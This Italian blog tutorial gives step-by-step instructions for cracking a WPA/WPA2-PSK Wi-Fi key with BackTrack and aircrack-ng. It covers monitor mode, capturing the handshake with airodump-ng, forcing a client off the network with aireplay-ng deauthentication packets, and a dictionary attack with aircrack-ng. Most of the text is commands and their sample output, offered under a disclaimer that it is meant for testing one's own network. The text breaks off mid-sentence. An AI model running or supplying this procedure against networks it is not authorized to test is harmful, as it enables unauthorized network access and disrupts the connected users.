Questa guida spiega come catturare i pacchetti handshake wpa/wpa2 psk per potere attivare il bruteforce dictionary attack.
INTENDIAMO RICORDARE CHE ENTRARE IN UNA RETE WiFi PROTETTA E’ UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E’ DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE.
AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA.
Vedere la
NORMATIVA sul Wireless.
Saluti da drpepprONE
A tutt’oggi l’unico modo per poter recuperare una chiave wpa/wpa2 psk è usare un bruteforce dictionay attack, ovvero un attacco di tipo dizionario che prova in modo sequenziale tutte le password presenti in un file dizionario.Nell’attesa che venga scoperta una possibile vulnerabilità del WPA/WPA2 psk, vediamo come procedere.
Attenzione!!! Questo metodo funziona solo con wpa/wpa psk ovvero con metodo di autenticazione pre-shared keys. Se il metodo di autenticazione è diverso da PSK non sarà possibile utilizare tale procedura:
Attenzione affinchè sia possibile catturare gli handshake è indispensabile e necessario che la nostra scheda wireless comunichi alla stessa velocità e nella stessa modalità del router access point.
Quindi per esempio se la nostra scheda è in “B” mode e il router/AP è in “G” mode, non sarà possibile catturare gli handshake.
Vale lo stesso per la velocità ad esempio 11MB, 54MB, etc.
Per scoprire quale siano la modalità e la velocità corrette si può provare a cambiarele finchè gli handshake non vengono catturarti.
Per verificare il rate usato dal router/Ap, avviamo kismet selezionamio il nostro router e nelle info verrà anche descritto il rate con cui esso comunica.
Per cambiare il rate useremo il seguente comando:
iwconfig ath0 rate [auto,11,54 etc]
Per cambiare il transmission mode eseguiremo il comando:
iwpriv ath0 mode 2 (dove il numero indica uno fra le seguenti modalità)
Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g
New Update :
Se nonostante il rate di trasmeissione dalla nostra scheda di rete sia uguale a quello dell AP e non riceviamo l’handshake wpa, proviamo a settare il rate ad 1 M. In molti casi il rate ad 1 M risolve ogni problema.
[iwconfig ath0 rate 1M]
.::Prerequisiti:.
A]Un client connesso alla rete wpa/wpa2 psk(necessario per velocizzare il processo di creazione di pacchetti handshake)
B]Una scheda di rete con chipset compatibile con il packet injection in monitor mode
C]La distribuzione live BACKTRACK 2
D]I dati della rete wpa/wpa2 psk (il Mac Address del router/il Mac Address del client connesso, il canale wifi usato dal router per comunicare)
-.-.-.-.-.-Questa guida viene usata una scheda di rete wireless con chipset Atheros che usa i driver madwifi, che utilizzano come nome virtuale del device athX-.-.-.-.-.-
1] Avviamo la nostra interfaccia wireless in monitor mode:
Verifichiamo prima con il comando iwconfig se esitono interfacce athX e in tal caso le eliminiamo:
airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP estroyed)
Lanciamo iwconfig per verificare che non ci siano più interfacce athX attive:
iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.If there are any remaining athX
Avviamo airmon-ng specificando il canale su cui il router comunica:
airmon-ng start wifi0 9
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Per verificare che la nostra scheda sia effetivamente in monitor mode lanciamo il comando iwconfig e verifichiamo la voce “Mode”
iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point:00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2]Avviamo airodump-ng per catturare gli authentication handshake
airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w catturawpa ath0
Dove:
-c 9 è il canale su cui il router/access point comunica
– -bssid 00:14:6C:7E:40:80 Il MAC address del router/access point.
-w catturawpa il nome del file in cui verrano salvati i dati.
Ecco come si presenta airodump-ng:
CH 9 ][ Elapsed: 4 s ][ 2007-11-22 16:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK drpepperONE
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
Come vedete sopra è collegato un client.
3] Usare aireplay-ng per deautenticare il client connesso
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
Dove:
-0 è il deauthentication mode
5 è il numero di gruppi di pacchetti deauthentication da mandare
-a 00:14:6C:7E:40:80 è il MAC address dell router/access point
-c 00:0F:B5:FD:FB:C2 è il MAC address del client da deautenticare
ath0 il nome dell’interfaccia wireless
Questo è l’output del comando
“aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0”
12:55:56 Sending DeAuth to station — STMAC: [00:0F:B5:FD:FB:C2]
12:55:56 Sending DeAuth to station — STMAC: [00:0F:B5:FD:FB:C2]
12:55:57 Sending DeAuth to station — STMAC: [00:0F:B5:FD:FB:C2]
12:55:58 Sending DeAuth to station — STMAC: [00:0F:B5:FD:FB:C2]
12:55:58 Sending DeAuth to station — STMAC: [00:0F:B5:FD:FB:C2]
Una volta deautenticato il client, esso riproverà a riconnettersi producendo cosi pacchetti handshake.
4] Avviare aircrack-ng per recuperare la pre-shared key
Per effettuare questo passo è necessario avere un file dizionario di pasword che contenga il più grosso numero possibili di password.
aircrack-ng -w dizionario -b 00:14:6C:7E:40:80 catturawpa*.cap
Dove:
-w dizionario è il nome del file dizionario.
*.cap è il l’lenco dei file di capture che abbiamo collezzionato.
Opening catturawpa-01.cap
Opening catturawpa-02.cap
Opening catturawpa.cap
Opening catturawpa.cap
Read 1827 packets.
No valid WPA handshakes found.
In questo esempio avviando aircrack-ng non sono presenti ancora pacchetti handshake.
Qui invece vi è l’esempio in cui sono presenti handshake:
Opening catturawpa-01.cap
Opening catturawpa-02.cap
Opening catturawpa.cap
Opening catturawpa.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 drpepperONE WPA (1 handshake)
Selezioniamo 1 per sceglere la rete interessata:
E qui la schermata di aicrack alla fine quando trova la nostra chiave:
Aircrack-ng 0.9
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Nota: Se usate la versione dev (sviluppo) di aricrack-ng e se la password da trovare contiene o un carattere speciale o una lettera maiuscola o uno spazio, aircrack-ng versione dev non riuscirà a riconoscerla.
Quindi consiglio di usare sempre l’ultima versione stabile ove invece aircrack-ng riesce tranquillamente a trovare tutti i caratteri.
Infatti dalla definizione degli standard wpa, la password deve essere di lunghezza minima di 8 e massima 63 caratteri stampabili della tabella ASCII:
quindi una password wpa può contenere tutti i seguenti caratteri:
Filed under: 1 | Tagged: aircrack, backtrack, crack, wpa | Leave a comment »